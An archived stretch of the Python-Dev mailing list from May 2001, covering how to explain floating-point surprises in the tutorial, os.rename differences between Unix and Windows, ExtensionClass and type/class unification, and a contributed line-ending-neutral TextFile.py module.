In one sense it's much worse:  it's only trying to explain a single cause of
fp surprises.  OTOH, it explains it precisely while giving the reader the
tools needed to do an exact analysis of any case of that particular class.
The Lahey link touches on all the common sources of surprises, but leaves
them fuzzy.

> There is less "background".  Eg, in almost the first paragraph we see:
>
> """
> Rewriting
>     1        J
>    ---  ~= ----
>    10      2**N
> """
>
> And I went "huh?  Where did j and N spring from?".  Reading a bit further
> made it clear, but this document did seem a little impenetrable to
> floating point or maths newbies.

It did its job for them if it simply scared them <0.5 wink>.

> It seems to me that the RepresentationError document was written for
> people with a decent background in maths -

There's nothing more complicated than integer division there.

> exactly the sort of people who _don't_ need such a document.

They actually do:  regardless of math background, nothing about f.p. is
obvious before studying f.p. as a subject in its own right.  It's "not like"
anything else, and in previous lives I spent a good chunk of my work time
explaining the same stuff to doctorates.  Mathematicians were actually the
hardest audience at first, perhaps because they had the hardest time
admitting they didn't already understand it; after getting beyond bruised
professional pride, though, they were the easiest audience to bring up to
speed.


From tim@digicool.com  Tue May 22 05:58:21 2001
From: tim@digicool.com (Tim Peters)
Date: Tue, 22 May 2001 00:58:21 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>

[Michel Pelletier, on http://www.lahey.com/float.htm]
> I liked the tone too, but it really goes into a lot of detail, there's
> this problem, and that one, oh and also *this* one and then there's
> *that* and the other thing, and after a while you get the impression
> that floating-point is for the insane.

Using an unfamiliar power tool with sharp edges, and while blindfolded, is
insane.

[and on http://www.python.org/cgi-bin/moinmoin/RepresentationError]

> I agree.  Equations should not be needed to explain this.

There's exactly one equation on that page, saying that one ratio of two
integers is approximately equal to another ratio of two integers.  If that's
too much for you, and you weren't satisfied with the *initial* hand-wavy
explanation ("1/10 is not exactly representable as a binary fraction")
either, then it's up to you to do better than the latter without actually
saying anything useful <wink>:

Q:  Why is Python broken:

    >>> 0.1
    0.10000000000000001

A:  [your turn]


From gward@python.net  Tue May 22 14:41:57 2001
From: gward@python.net (Greg Ward)
Date: Tue, 22 May 2001 09:41:57 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>; from tim@digicool.com on Mon, May 21, 2001 at 05:57:22PM -0400
References: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>
Message-ID: <20010522094157.A1245@gerg.ca>

On 21 May 2001, Tim Peters said:
> + Happy to add text explaining the existence of surprises, and
>   providing a URL.  Do the floating-point morons <wink> on Python-Dev
>   find this one comprehensible?:
> 
>     http://www.lahey.com/float.htm

I found this article more useful, interesting, and informative than
whatever I learned about binary floating-point in my academic years.
Good link, Tim.  Two catches:

  * I can just barely follow the FORTRAN examples; I very much doubt
    the average Python newbie would have any more luck than me

  * I tried several of the FORTRAN examples in Python, and did not
    witness any of the gotchas they are meant to illustrate.  Possibly
    it's just single-precision vs. double-precision difference, but
    Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2
    doesn't demonstrate the same gotchas as that article does.

        Greg
-- 
Greg Ward - geek                                        gward@python.net
http://starship.python.net/~gward/
Ban the bomb -- save the world for conventional warfare.


From skip@pobox.com (Skip Montanaro)  Tue May 22 17:01:40 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Tue, 22 May 2001 11:01:40 -0500
Subject: [Python-Dev] type/class unification and ExtensionClass
Message-ID: <15114.36196.4677.99240@beluga.mojam.com>

I know Guido has recently been working on some of the type/class unification
issues (PEPs 252 and 253).  Will this affect ExtensionClass?  In particular,
will it go away or have to be reworked significantly for Python 2.2 or 2.3?
The new PyGtk wrappers use the ExtensionClass module.  I'm curious about how
hard it would be to move away from ExtensionClass for these wrappers.  My
reading of PEP 253 suggests this shouldn't be too difficult.

I'd ask Guido directly, but I figure other people on this list might also
have useful input on the issue and/or be able to answer, saving him the
time.  At any rate, he will see it posted here just the same.

Thx,

Skip


From guido@digicool.com  Tue May 22 17:23:52 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 12:23:52 -0400
Subject: [Python-Dev] type/class unification and ExtensionClass
In-Reply-To: Your message of "Tue, 22 May 2001 11:01:40 CDT."
 <15114.36196.4677.99240@beluga.mojam.com>
References: <15114.36196.4677.99240@beluga.mojam.com>
Message-ID: <200105221623.f4MGNqC02110@odiug.digicool.com>

> I know Guido has recently been working on some of the type/class unification
> issues (PEPs 252 and 253).

And I'm not done yet. :-)

> Will this affect ExtensionClass?  In particular,
> will it go away or have to be reworked significantly for Python 2.2 or 2.3?

Probably.  Jim Fulton in particular asked me to work on this because
he wants to phase out ExtensionClass.

> The new PyGtk wrappers use the ExtensionClass module.  I'm curious about how
> hard it would be to move away from ExtensionClass for these wrappers.  My
> reading of PEP 253 suggests this shouldn't be too difficult.

I don't think so either.

> I'd ask Guido directly, but I figure other people on this list might also
> have useful input on the issue and/or be able to answer, saving him the
> time.  At any rate, he will see it posted here just the same.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From michel@digicool.com  Tue May 22 22:44:09 2001
From: michel@digicool.com (Michel Pelletier)
Date: Tue, 22 May 2001 14:44:09 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>
Message-ID: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>

On Tue, 22 May 2001, Tim Peters wrote:

> [Michel Pelletier, on http://www.lahey.com/float.htm]
> > I liked the tone too, but it really goes into a lot of detail, there's
> > this problem, and that one, oh and also *this* one and then there's
> > *that* and the other thing, and after a while you get the impression
> > that floating-point is for the insane.
> 
> Using an unfamiliar power tool with sharp edges, and while blindfolded, is
> insane.

I should have been more clear, I liked the first couple of paragraphs for
their descriptions, and there is certainly nothing wrong with the document
as it stands, but such an explanation would be a bit too lengthly and
boring to a typical fifth grader or photoshop guru going through the
Tutorial and dabbling in programming for the very first time.

> [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError]
> 
> > I agree.  Equations should not be needed to explain this.
> 
> There's exactly one equation on that page, saying that one ratio of two
> integers is approximately equal to another ratio of two integers.

Who was it that said every equation will halve your audience?  I agree
with that, the tutorial should try to be as broad and simple as possible.

> If that's
> too much for you, and you weren't satisfied with the *initial* hand-wavy
> explanation ("1/10 is not exactly representable as a binary fraction")
> either, then it's up to you to do better than the latter without actually
> saying anything useful <wink>:

The latter is fine, although I think the first document hand-waves better.  

-Michel


From skip@pobox.com (Skip Montanaro)  Tue May 22 22:54:42 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Tue, 22 May 2001 16:54:42 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
Message-ID: <15114.57378.887742.531145@beluga.mojam.com>

Couldn't figure out why this message never generated any comment.  Turns out
it didn't reach the list because the host I sent it from
(dynamic4.tttech.com) couldn't be resolved.  I just noticed it in my errors
mailbox and am sending it out again.

------------------------------------------------------------------------------
It was brought to my attention a week ago by a client that os.rename
semantics differ between Unix and Windows.  On Unix, if the destination file
already exists it is silently deleted.  On Windows, an exception is raised.
I was able to verify this for Python 2.0 on Windows98.  I assume nothing
changed for 2.1, but I can't verify that.  (Windows trashed my partition
table and my Linux root partition while I was downloading 2.1.
Consequently, I no longer run Windows.  Take that, Bill...)  I haven't
checked the Mac yet (will do that when I get back to the US), but I think
that os.rename should have the same semantics across all platforms.  To the
extent reasonably possible, I think this should also be true of other common
functions exposed through the os module.

On the (unsupportable) theory that to-date, more Python apps have been
written and/or deployed on Unix-like systems and that where Windows apps are
concerned, many developers will have added a thin wrapper to mimic the Unix
semantics, I think less breakage would result if the Unix semantics were
implemented in the Windows version.  It appears that is what POSIX
compliance would demand as well.

Skip


From fdrake@acm.org  Tue May 22 22:55:29 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Tue, 22 May 2001 17:55:29 -0400 (EDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
References: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>
 <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <15114.57425.540688.205255@cj42289-a.reston1.va.home.com>

Michel Pelletier writes:
 > as it stands, but such an explanation would be a bit too lengthly and
 > boring to a typical fifth grader or photoshop guru going through the
 > Tutorial and dabbling in programming for the very first time.

  But that's not the audience the Python Tutorial is targetted to --
readers are expected to be essentially competant in at least one "3rd
generation" language.  Maybe a few will shy away from a simple
equation, but not so many.  Those who do would do well to shy away
from FP as well.  ;-)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake@acm.org  Tue May 22 23:04:11 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Tue, 22 May 2001 18:04:11 -0400 (EDT)
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <15114.57378.887742.531145@beluga.mojam.com>
References: <15114.57378.887742.531145@beluga.mojam.com>
Message-ID: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com>

skip@pobox.com writes:
 > On the (unsupportable) theory that to-date, more Python apps have been
 > written and/or deployed on Unix-like systems and that where Windows apps are
 > concerned, many developers will have added a thin wrapper to mimic the Unix
 > semantics, I think less breakage would result if the Unix semantics were

  I don't know whether there are more deployed Python apps on Unix
than on Windows (and I've no good idea about how to find out), but I
think unifying the semantics one way or the other is a good thing.
Regardless of which set of semantics is chosen.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From mwh@python.net  Tue May 22 23:07:12 2001
From: mwh@python.net (Michael Hudson)
Date: 22 May 2001 23:07:12 +0100
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Michel Pelletier's message of "Tue, 22 May 2001 14:44:09 -0700 (PDT)"
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>

Michel Pelletier <michel@digicool.com> writes:

> Who was it that said every equation will halve your audience?

It was Stephen Hawking's editor when he was preparing A Brief History
Of Time (or at least, it gets mentioned in the preface; the advice may
be older).

Cheers,
M.

-- 
7. It is easier to write an incorrect program than understand a
   correct one.
  -- Alan Perlis, http://www.cs.yale.edu/homes/perlis-alan/quotes.html


From jeremy@digicool.com  Tue May 22 23:57:40 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Tue, 22 May 2001 18:57:40 -0400 (EDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
 <m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <15114.61156.692322.674137@slothrop.digicool.com>

>>>>> "MWH" == Michael Hudson <mwh@python.net> writes:

  MWH> Michel Pelletier <michel@digicool.com> writes:
  >> Who was it that said every equation will halve your audience?

  MWH> It was Stephen Hawking's editor when he was preparing A Brief
  MWH> History Of Time (or at least, it gets mentioned in the preface;
  MWH> the advice may be older).

There's a similar saw about excerpts of books in foreign languages.  I
believe I first read it in reference to Umberto Eco's Foucault's
Pendulum, which starts with a full page of Hebrew.

Jeremy


From chrishbarker@home.net  Wed May 23 00:21:01 2001
From: chrishbarker@home.net (Chris Barker)
Date: Tue, 22 May 2001 16:21:01 -0700
Subject: [Pythonmac-SIG] Re: [Python-Dev] Import hook to do end-of-line
 conversion?
References: <20010414192445-r01010600-f8273ce6@213.84.27.177>
Message-ID: <3B0AF45D.732126E6@home.net>

This is a multi-part message in MIME format.
--------------B9643430766B782E71A5BE98
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Just van Rossum wrote:

> Agreed. I'll try to write one, once I'm feeling better: having the flu doesn't
> seem to help focussing on actual content...
> 
> Just

Just (or anyone else)

Have you made any progress on this PEP? I'd like to see it happen, so if
you havn't done it, I'll try to find the time to make a start on it
myself.

I have written a simple class that impliments a line-ending-neutral text
file class. I wrote it because I have a need for it, and I thought it
would be a reasonable prototype for any syntax and methods we might want
to use in an actual implimentation. I doubt anyone would find the
methods I used particularly clean or elegant (or fast) but it's the
first thing I've come up with, and it seems to work.

I've enclosed the module with this email. If that doesn't work, let me
know and I'll put it on a website.

-Chris

-- 
Christopher Barker,
Ph.D.                                                           
ChrisHBarker@home.net                 ---           ---           ---
http://members.home.net/barkerlohmann ---@@       -----@@       -----@@
                                   ------@@@     ------@@@     ------@@@
Oil Spill Modeling                ------   @    ------   @   ------   @
Water Resources Engineering       -------      ---------     --------    
Coastal and Fluvial Hydrodynamics --------------------------------------
------------------------------------------------------------------------
--------------B9643430766B782E71A5BE98
Content-Type: text/plain; charset=us-ascii;
 name="TextFile.py"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="TextFile.py"

#!/usr/bin/env python

"""

TextFile.py : a module that provides a UniversalTextFile class, and a
replacement for the native python "open" command that provides an
interface to that class.

It would usually be used as:

from TextFile import open

then you can use the new open just like the old one (with some added flags and arguments)

or

import TextFile

file = TextFile.open(filename,flags,[bufsize], [LineEndingType], [LineBufferSize])


"""
import os

## Re-map the open function
_OrigOpen = open

def open(filename,flags = "",bufsize = -1, LineEndingType = "", LineBufferSize = ""):
    """
    
    A new open function, that returns a regular python file object for
    the old calls, and returns a new nifty universal text file when
    required.

    This works just like the regular open command, except that a new
    flag and a new parameter has been added.

    Call:

    file = open(filename,flags = "",bufsize = -1, LineEndingType = ""):
    - filename is the name of the file to be opened
    - flags is a string of one letter flags, the same as the standard open
      command, plus a "t" for universal text file.
    - - "b" means binary file, this returns the standard binary file object
    - - "t" means universal text file
    - - "r" for read only
    - - "w" for write. If there is both "w" and "t" than the user can
        specify a line ending type to be used with the LineEndingType
        parameter.
    - - "a" means append to existing file

    - bufsize specifies the buffer size to be used by the system. Same
      as the regular open function

    - LineEndingType is used only for writing (and appending) files, to specify a
      non-native line ending to be written.
    - - The options are: "native", "DOS", "Posix", "Unix", "Mac", or the
        characters themselves( "\r\n", etc. ). "native" will result in
        using the standard file object, which uses whatever is native
        for the system that python is running on.

    - LineBufferSize is the size of the buffer used to read data in
    a readline() operation. The default is currently set to 200
    characters. If you will be reading files with many lines over 200
    characters long, you should set this number to the largest expected
    line length.

    
    """

    if "t" in flags: # this is a universal text file
        if ("w" in flags or "a" in flags) and LineEndingType == "native":
            return _OrigOpen(filename,flags.replace("t",""), bufsize)
        return UniversalTextFile(filename,flags,LineEndingType,LineBufferSize)
    else: # this is a regular old file
        return _OrigOpen(filename,flags,bufsize)
    
    
class UniversalTextFile:
    """
    
    A class that acts just like a python file object, but has a mode
    that allows the reading of arbitrary formated text files, i.e. with
    either Unix, DOS or Mac line endings. [\n , \r\n, or \r]

    To keep it truly universal, it checks for each of these line ending
    possibilities at every line, so it should work on a file with mixed
    endings as well.

    """
    def __init__(self,filename,flags = "",LineEndingType = "native",LineBufferSize = ""):
        self._file = _OrigOpen(filename,flags.replace("t","")+"b")

        LineEndingType = LineEndingType.lower()
        if LineEndingType == "native":
            self.LineSep = os.linesep()
        elif LineEndingType == "dos":
            self.LineSep = "\r\n"
        elif LineEndingType == "posix" or LineEndingType == "unix" :
            self.LineSep = "\n"
        elif LineEndingType == "mac":
            self.LineSep = "\r"
        else:
            self.LineSep = LineEndingType
        
        ## some attributes
        self.closed = 0
        self.mode = flags
        self.softspace = 0
        if LineBufferSize:
            self._BufferSize = LineBufferSize
        else:
            self._BufferSize = 100

    def readline(self):
        start_pos = self._file.tell()
        ##print "Current file posistion is:", start_pos
        line = ""
        TotalBytes = 0
        Buffer = self._file.read(self._BufferSize)
        while Buffer:
            ##print "Buffer = ",repr(Buffer)
            newline_pos = Buffer.find("\n")
            return_pos  = Buffer.find("\r")
            if return_pos == newline_pos-1 and return_pos >= 0: # we have a DOS line
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
            elif ((return_pos < newline_pos) or newline_pos < 0 ) and return_pos >=0: # we have a Mac line
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = return_pos+1
                break
            elif newline_pos >= 0: # we have a Posix line
                line = Buffer[:newline_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
            else: # we need a larger buffer
                NewBuffer = self._file.read(self._BufferSize)
                if NewBuffer:
                    Buffer = Buffer + NewBuffer
                else: # we are at the end of the file, without a line ending.
                    self._file.seek(start_pos + len(Buffer))
                    return Buffer

        self._file.seek(start_pos + TotalBytes)
        return line

    def readlines(self,sizehint = None):
        """

        readlines acts like the regular readlines, except that it
        understands any of the standard text file line endings ("\r\n",
        "\n", "\r").

        If sizehint is used, it will read a a mximum of that many
        bytes. It will not round up, as the regular readline does. This
        means that if your buffer size is less thatn the length of the
        next line, you won't get anything.

        """
        
        if sizehint:
            Data = self._file.read(sizehint)
        else:
            Data = self._file.read()

        if len(Data) == sizehint:
            #print "The buffer is full"
            FullBuffer = 1
        else:
            FullBuffer = 0
        Data = Data.replace("\r\n","\n").replace("\r","\n")
        Lines = [line + "\n" for line in Data.split('\n')]
        #print Lines
        ## If the last line is only a linefeed it is an extra line
        if Lines[-1] == "\n":
            del Lines[-1]
        ## if it isn't then the last line didn't have a linefeed, so we need to remove the one we put on.
        else:
            ## or it's the end of the buffer
            if FullBuffer:
                #print "the file is at:",self._file.tell()
                #print "the last line has length:",len(Lines[-1])
                self._file.seek(-(len(Lines[-1])-1),1) # reset the file position
                del(Lines[-1])
            else:
                Lines[-1] = Lines[-1][:-1]
        return Lines

    def readnumlines(self,NumLines = 1):
        """

        readnumlines is an extension to the standard file object. It
        returns a list containing the number of lines that are
        requested. I have found this to be very usefull, and allows me to avoid the many loops like:

        lines = []
        for i in range(N):
            lines.append(file.readline())

        Also, If I ever get around to writing this in C, it will provide a speed improvement.

        """
        Lines = []
        while len(Lines) < NumLines:
            Lines.append(self.readline())
        return Lines

    def read(self,size = None):
        """
     
        read acts like the regular read, except that it tranlates any of
        the standard text file line endings ("\r\n", "\n", "\r") into a
        "\n"
        
        If size is used, it will read a maximum of that many bytes,
        before translation. This means that if the line endings have
        more than one character, the size returned will be smaller. This
        could gbe patched, but it didn't seem worth it. If you want that
        much control, use a binary file.
      
        """
        
        if size:
            Data = self._file.read(size)
        else:
            Data = self._file.read()
            
        return Data.replace("\r\n","\n").replace("\r","\n")
    
    def write(self,string):
        """

        write is just like the regular one, except that it uses the line
          separator specified when the file was opened for writing or
          appending.


        """
        self._file.write(string.replace("\n",self.LineSep))

    def writelines(self,list):
        for line in list:
            self.write(line)
        

    # The rest of the standard file methods mapped
    def close(self):
        self._file.close()
        self.closed = 1
    def flush(self):
        self._file.flush()
    def fileno(self):
        return self._file.fileno()
    def seek(self,offset,whence = 0):
        self._file.seek(offset,whence)
    def tell(self):
        return self._file.tell()
    

--------------B9643430766B782E71A5BE98--


From guido@digicool.com  Wed May 23 00:46:53 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 19:46:53 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: Your message of "Tue, 22 May 2001 16:54:42 CDT."
 <15114.57378.887742.531145@beluga.mojam.com>
References: <15114.57378.887742.531145@beluga.mojam.com>
Message-ID: <200105222346.f4MNkr104833@odiug.digicool.com>

> It was brought to my attention a week ago by a client that os.rename
> semantics differ between Unix and Windows.  On Unix, if the destination file
> already exists it is silently deleted.  On Windows, an exception is raised.
> I was able to verify this for Python 2.0 on Windows98.  I assume nothing
> changed for 2.1, but I can't verify that.

I've always known this, and assumed it was common knowledge.
Sorry. ;-)

> (Windows trashed my partition
> table and my Linux root partition while I was downloading 2.1.
> Consequently, I no longer run Windows.  Take that, Bill...)  I haven't
> checked the Mac yet (will do that when I get back to the US), but I think
> that os.rename should have the same semantics across all platforms.  To the
> extent reasonably possible, I think this should also be true of other common
> functions exposed through the os module.
> 
> On the (unsupportable) theory that to-date, more Python apps have been
> written and/or deployed on Unix-like systems and that where Windows apps are
> concerned, many developers will have added a thin wrapper to mimic the Unix
> semantics, I think less breakage would result if the Unix semantics were
> implemented in the Windows version.  It appears that is what POSIX
> compliance would demand as well.
> 
> Skip

I certainly wouldn't want to try to emulate the Windows semantics on
Unix.  However, I think that emulating the correct Posix semantics on
Windows is not possible either.  The Posix rename() call guarantees
that it is atomic: there is no point in time where the file doesn't
exist at all (and a system or program crash can't delete the file).  I
wouldn't know how to do that in Windows -- the straightforward version

    if os.path.exists(target):
        os.unlink(target)
    os.rename(source, target)

leaves a vulnerability open where the target doesn't exist and if at
that point the system crashes or the program is killed, you lose the
target.

I would prefer to document the difference so applications can decide
how to deal with this.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Wed May 23 00:50:29 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 19:50:29 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Tue, 22 May 2001 14:44:09 PDT."
 <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <200105222350.f4MNoUj04853@odiug.digicool.com>

> Who was it that said every equation will halve your audience?

Einstein.

> I agree with that, the tutorial should try to be as broad and simple
> as possible.

But keep in mind that the particular Python tutorial we're talking
about is intended for an audience of folks who already know how to
program.  I vote against dumbing this down.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From michel@digicool.com  Wed May 23 01:17:59 2001
From: michel@digicool.com (Michel Pelletier)
Date: Tue, 22 May 2001 17:17:59 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105222350.f4MNoUj04853@odiug.digicool.com>
Message-ID: <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain>

On Tue, 22 May 2001, Guido van Rossum wrote:

> > I agree with that, the tutorial should try to be as broad and simple
> > as possible.
> 
> But keep in mind that the particular Python tutorial we're talking
> about is intended for an audience of folks who already know how to
> program.  I vote against dumbing this down.

Now that I've actually read the tutorial (wink) I see the true target
audience.  For some reason, I thought it was oriented more toward the CP4E
audience.

Is there a python "children's book" complete with big red dogs and rabbits
in waistcoats?  That would be an interesting project...

-Michel


From guido@digicool.com  Wed May 23 01:20:25 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 20:20:25 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Tue, 22 May 2001 17:17:59 PDT."
 <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain>
References: <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain>
Message-ID: <200105230020.f4N0KPU05103@odiug.digicool.com>

> Is there a python "children's book" complete with big red dogs and rabbits
> in waistcoats?  That would be an interesting project...

See http://www.python.org/sigs/edu-sig/ and
http://www.python.org/doc/Intros.html (the latter has a section with
intros for non-programmers).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Wed May 23 01:23:42 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 22 May 2001 20:23:42 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEOCKDAA.tim.one@home.com>

I struggled with a way to do a better job of explaining this stuff last
night.  As I see others already said, the Tutorial is not aimed at script
kiddies, or non-programmers, or even programming newbies, but at programmers
who are simply new to Python.  So everything I put in the tutorial was either
jarringly out of place, or inadequate to address the audience you (Michel)
have in mind.  But I agree that's an important audience, and I spend a fair
chunk of my life now anyway eexplaining this stuff over & over to those who
think computing a ratio of two integers is akin to solving fourth order
differential equations <wink>.

In the end I decided to write a Tutorial Appendix in a much gentler style.
It doesn't really fit with the rest of the Tutorial, but then that's *why*
it's an Appendix.  The patch is here:

    http://sourceforge.net/tracker/index.php?func=detail&
        aid=426208&group_id=5470&atid=305470

I also changed the tutorial fp examples so they have an excellent chance of
displaying the same strings across all platforms, and even if Python 10K
defaults to decimal floating-point someday (perhaps in the year 10000, as its
name suggests).


From gward@python.net  Wed May 23 01:33:11 2001
From: gward@python.net (Greg Ward)
Date: Tue, 22 May 2001 20:33:11 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>; from guido@digicool.com on Tue, May 22, 2001 at 07:46:53PM -0400
References: <15114.57378.887742.531145@beluga.mojam.com> <200105222346.f4MNkr104833@odiug.digicool.com>
Message-ID: <20010522203311.E1245@gerg.ca>

On 22 May 2001, Guido van Rossum said:
> I would prefer to document the difference so applications can decide
> how to deal with this.

I agree -- it has always seemed to me that the standard library merely
exposes the underlying OS functionality for you.  This puts portability
somewhat in the hands of the application writer -- with power comes
responsibility.  I think that's the way it should be; any attempt to
convert OS A to the semantics of OS B will fall down somewhere.  Witness
the loss-of-atomicity in Guido's example.  I'm sure any other semantic
difference between OSes would have similar "gotchas" if we attempted to
paper over them.

        Greg
-- 
Greg Ward - just another Python hacker                  gward@python.net
http://starship.python.net/~gward/
Beware of altruism.  It is based on self-deception, the root of all evil.


From tim.one@home.com  Wed May 23 07:31:29 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 23 May 2001 02:31:29 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <20010522094157.A1245@gerg.ca>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>

[Greg Ward, on http://www.lahey.com/float.htm]

> I found this article more useful, interesting, and informative than
> whatever I learned about binary floating-point in my academic years.
> Good link, Tim.  Two catches:
>
>   * I can just barely follow the FORTRAN examples; I very much doubt
>     the average Python newbie would have any more luck than me

The goal is to frighten them:  the ones with the right stuff to use fp
without destroying a satellite, bringing down the Internet, designing a
pacemaker that fails when rounding a corner clockwise at 1.37g, causing a
small country's economy to collapse, making jet fighters spontaneously turn
upside down when crossing the equator, or triggering WW III by accident, will
persist <wink>.  BTW, not all of those were made up!

>   * I tried several of the FORTRAN examples in Python, and did not
>     witness any of the gotchas they are meant to illustrate.  Possibly
>     it's just single-precision vs. double-precision difference, but
>     Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2
>     doesn't demonstrate the same gotchas as that article does.

You can't illustrate the last half of their examples in Python without
playing obscure games with the struct module, because they rely on the
existence of more than one size of floating-point type.

Your lack of luck with the first half of their examples is indeed solely due
to that he used single-precision examples and Python's float is double.  You
need to find different numbers to show the same things in Python; like so:

# Binary Floating Point
x = 100000000000. * 0.00000000001
if x != 1.0:
    print "Oops!  It's %r" % x

# Inexactness
a = 98. / 49.
reciprocal = 1./49.
b = 98. * reciprocal
if a != b:
    print "Oops!  They're %r and %r" % (a, b)

# Crazy Conversions
x = 32.05
y = x * 100. # "looks like" 3205. if display rounded
i = int(y)   # actually truncates to 3204
print y, i, repr(y)

It's Real Work coming up with stuff like that.  What I'm hearing is that
people won't understand it anyway -- so screw it.  If they want an education,
they can prove it by doing a google search <0.6 wink>.


From tim.one@home.com  Wed May 23 07:44:14 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 23 May 2001 02:44:14 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>

[Guido]
> ...
> I certainly wouldn't want to try to emulate the Windows semantics on
> Unix.  However, I think that emulating the correct Posix semantics on
> Windows is not possible either.

Neither is it desirable:  Windows isn't POSIX, and Windows users would be
appalled if os.rename() could silently destroy files.  If such a function
needs to exist, create a new cowboy_unix_tricks module instead <wink>.

This has never been a problem for me because I always check to see whether
the target file exists before using os.rename(), and do something else if it
does.  I understand that's vulnerable to races, but nobody asked whether I
cared about that <wink>.

> The Posix rename() call guarantees that it is atomic: there is no
> point in time where the file doesn't exist at all (and a system or
> program crash can't delete the file).  I wouldn't know how to do
> that in Windows -- the straightforward version
>
>     if os.path.exists(target):
>         os.unlink(target)
>     os.rename(source, target)
>
> leaves a vulnerability open where the target doesn't exist and if at
> that point the system crashes or the program is killed, you lose the
> target.

More obvious, it also fails if target simply exists and is open (you can't
unlink an open file on Windows).

Nevertheless, you can do this renaming safely on Windows, via doing the right
system magic to make rename happen at reboot time before Windows actually
starts.  But I'm not sure Skip's client would want to reboot each time Python
did a file rename <wink>.

> I would prefer to document the difference so applications can decide
> how to deal with this.

Yup!


From MarkH@ActiveState.com  Wed May 23 09:55:17 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Wed, 23 May 2001 18:55:17 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com>

[Tim on a subject near and dear to his testicles]

> It's Real Work coming up with stuff like that.  What I'm hearing is that
> people won't understand it anyway -- so screw it.  If they want
> an education,
> they can prove it by doing a google search <0.6 wink>.

I am inclined to agree.

IMO, The Python tutorial or other documentation should include a basic
example of these "errors", and a link to _either_ of the HTML pages
referenced in this thread as an optional extra.

Just enough to stop _most_ of the "this is a bug" posts - but stopping well
short of any attempt to "educate" them in floating point madness.  Just
_one_ example of floats not being exact would suffice.

Going from my personal experience, I learnt long ago that floating point is
not exact.  That is all I needed to know to move on.  I didn't like it, and
I didn't understand exactly why (I thought I did, but Tim put a stop to that
